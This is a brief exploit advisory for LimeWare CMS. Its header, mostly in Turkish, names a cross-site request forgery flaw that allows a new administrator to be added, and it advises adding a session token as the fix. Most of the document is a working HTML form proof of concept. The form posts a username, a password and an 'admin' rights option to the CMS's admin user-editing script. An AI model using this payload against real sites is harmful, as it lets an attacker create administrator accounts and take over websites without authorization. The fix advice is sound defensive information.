< ------------------- header data start ------------------- >

#############################################################

# Application Name : LimeWare CMS

# vulnerable Type : XSRF

# Infection : Yeni Admin eklenebilir

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >





<form action=http://[site].com/[yol]/admin/editAdminUsers.php method=post>
<input type=text name=user maxlength=30 value=><br>
<input type=password name=pass maxlength=30 value=><br>
<input type=hidden name=date value=28/08/2009>
<select name=rights id=menuID >
<option value=guest selected>guest</option><option value=user>user</option><option value=admin>admin</option>
</select><br>
<input type=submit name=subjoin value=Ekle>
</form>
< -- bug code end of -- >